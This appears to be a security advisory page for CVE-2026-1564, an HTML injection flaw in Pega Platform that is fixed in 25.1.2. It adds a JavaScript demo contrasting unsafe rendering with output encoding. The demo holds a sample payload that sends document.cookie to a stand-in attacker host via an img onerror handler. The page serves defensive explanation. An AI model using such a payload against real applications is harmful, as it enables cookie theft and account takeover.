Platform
other
Component
pega-platform
Fixed in
25.1.2
CVE-2026-1564 is an HTML injection vulnerability in the Pega Platform. An attacker who holds a highly privileged user account with a developer role can inject malicious HTML into the application. Versions 8.1.0 through 25.1.1 are affected; the fix ships in Pega Infinity 25.1.2.
CVE-2026-1564 affects Pega Infinity and Pega Platform versions 8.1.0 through 25.1.1. It lets an attacker with elevated privileges and a developer role inject malicious HTML into the application's user interface. Depending on where the injected markup is rendered, exploitation could alter the appearance of the application, run attacker-controlled script in another user's browser, or expose sensitive information shown to that user. The requirement for a privileged developer account limits who can exploit the flaw, but the impact on the confidentiality and integrity of data viewed through the affected interface is significant, so the security update should be applied.
Exploitation requires a developer role and elevated privileges within the Pega system, so the realistic attackers are insiders or anyone who has compromised such an account. The attacker supplies markup through input parameters exposed in the user interface, such as text fields or forms, that the application later renders without adequate output encoding. When another user loads the affected page, that user's browser interprets the injected markup, which can allow cookie theft, redirection to attacker-controlled sites, or modification of the page content. Exploitation difficulty depends mainly on the attacker's familiarity with the Pega application architecture and with HTML injection techniques.
Exploit Status
EPSS
0.06% (18th percentile)
CISA SSVC
The recommended fix for CVE-2026-1564 is to upgrade to Pega Infinity 25.1.2 or later, which contains the changes that prevent the injection. Until the upgrade is applied, restrict developer-role access to trusted users and ensure that any user-provided data is encoded for its output context before it is displayed in the user interface. Enforced access-control policies and periodic security reviews of custom UI components are standard practice against this class of flaw. CVE-2026-1564 is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog, which means no confirmed in-the-wild exploitation has been reported to CISA, not that the flaw is harmless; monitor official Pega security advisories for updates.
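As an added illustration of the injection path and the output-encoding mitigation described above (example code written for this page, not Pega code; Pega's own server-side rendering is not shown), the JavaScript below renders a constructed, hostile display-name value two ways: concatenated straight into markup, and encoded for the HTML text context. A small tag counter stands in for the "review before display" step: the encoded render contains only the template's own tag. The payload, the escapeHtml and rejectMarkup helpers, and the countTags check are assumptions made for this example.

```javascript
// Added example (not Pega's code): HTML injection through a string-built
// template, the same render with contextual output encoding, and a simple
// review check that tells the two results apart.

// Constructed sample input: a display-name value that a developer-role
// user could type into a form field. The attacker domain is fictitious.
const HOSTILE_DISPLAY_NAME =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable: untrusted text is concatenated directly into markup, so the
// victim's browser parses the attacker's value as HTML.
function renderUnsafe(displayName) {
  return `<span class="user">${displayName}</span>`;
}

// Encode the five characters that can change the HTML text context.
// (Attribute, URL and script contexts each need their own encoder.)
function escapeHtml(value) {
  const map = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
  };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: identical template, but the value is encoded for the text
// context, so the browser shows the payload as literal text.
function renderSafe(displayName) {
  return `<span class="user">${escapeHtml(displayName)}</span>`;
}

// Defense in depth for fields that should never carry markup (labels,
// names): reject the value at input time instead of relying on encoding
// alone. Returns true when the value is acceptable.
function rejectMarkup(value) {
  return !/[<>]/.test(String(value));
}

// Review check: count opening tags in a rendered fragment. A fragment
// built from this template should contain exactly one (the span).
function countTags(html) {
  return (html.match(/<[a-zA-Z][^>]*>/g) || []).length;
}

function demo() {
  const unsafe = renderUnsafe(HOSTILE_DISPLAY_NAME);
  const safe = renderSafe(HOSTILE_DISPLAY_NAME);
  return {
    unsafeTagCount: countTags(unsafe), // 2: the span plus the injected img
    safeTagCount: countTags(safe), // 1: only the template's span
    inputAccepted: rejectMarkup(HOSTILE_DISPLAY_NAME), // false
    unsafe,
    safe,
  };
}

console.log(demo());
```

In a real review the tag count is only a smoke test; the durable fix is to encode every untrusted value for the exact context it lands in, and to use the platform's own encoding functions rather than a hand-rolled helper.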
Update Pega Platform to version 25.1.2 or later to mitigate the HTML injection vulnerability. See the Pegasystems security remediation note for detailed instructions on applying the fix and verifying the mitigation.
Pega Platform versions 8.1.0 through 25.1.1 are vulnerable.
A user with elevated privileges and a developer role.
Upgrade to Pega Infinity 25.1.2 or a later version.
Restrict access to development functions and carefully review user-provided data.
No, CVE-2026-1564 is not currently listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.